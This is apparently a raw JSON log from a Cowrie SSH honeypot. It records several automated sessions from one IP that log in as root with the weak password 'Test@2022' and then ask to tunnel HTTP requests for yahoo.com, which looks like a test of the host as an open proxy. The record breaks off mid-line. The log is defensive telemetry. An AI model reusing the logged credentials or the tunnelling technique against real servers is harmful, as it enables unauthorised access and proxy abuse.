{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.756150Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.812934Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.094882Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25788,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25788","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.152384Z","session":"a409d4e60a25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.209069Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2684,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2684","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.362970Z","session":"a409d4e60a25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.419516Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.476882Z","src_ip":"213.209.150.239","session":"a409d4e60a25"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5636,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ea1bf244d6","protocol":"ssh","message":"New connection: 213.209.150.239:5636 (1.2.3.4:22) [session: 49ea1bf244d6]","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.532572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.533880Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.590645Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.873694Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11329,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11329","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.931240Z","session":"49ea1bf244d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:43.988067Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":24229,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24229","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.143043Z","session":"49ea1bf244d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.199811Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.258225Z","src_ip":"213.209.150.239","session":"49ea1bf244d6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5697,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f48693ae7d0","protocol":"ssh","message":"New connection: 213.209.150.239:5697 (1.2.3.4:22) [session: 7f48693ae7d0]","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.304498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.305225Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.352452Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.587056Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8900,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8900","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.635242Z","session":"7f48693ae7d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.682427Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10236,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10236","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.817455Z","session":"7f48693ae7d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.864481Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.912201Z","src_ip":"213.209.150.239","session":"7f48693ae7d0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5747,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b62687e4faf","protocol":"ssh","message":"New connection: 213.209.150.239:5747 (1.2.3.4:22) [session: 3b62687e4faf]","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.968063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:44.969141Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.025930Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.309165Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2183,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2183","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.367553Z","session":"3b62687e4faf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.424295Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16386,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16386","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.579041Z","session":"3b62687e4faf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.635781Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.693270Z","src_ip":"213.209.150.239","session":"3b62687e4faf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5807,"dst_ip":"1.2.3.4","dst_port":22,"session":"710d67ec1754","protocol":"ssh","message":"New connection: 213.209.150.239:5807 (1.2.3.4:22) [session: 710d67ec1754]","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.749196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.758009Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:45.806151Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.088934Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21283,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21283","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.146347Z","session":"710d67ec1754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.203073Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6699,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6699","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.359140Z","session":"710d67ec1754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.416050Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.473557Z","src_ip":"213.209.150.239","session":"710d67ec1754"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5868,"dst_ip":"1.2.3.4","dst_port":22,"session":"57b3277cbb38","protocol":"ssh","message":"New connection: 213.209.150.239:5868 (1.2.3.4:22) [session: 57b3277cbb38]","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.529236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:46.530087Z","src_ip":"213.209.150.239","session":"57b3277cbb38"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1"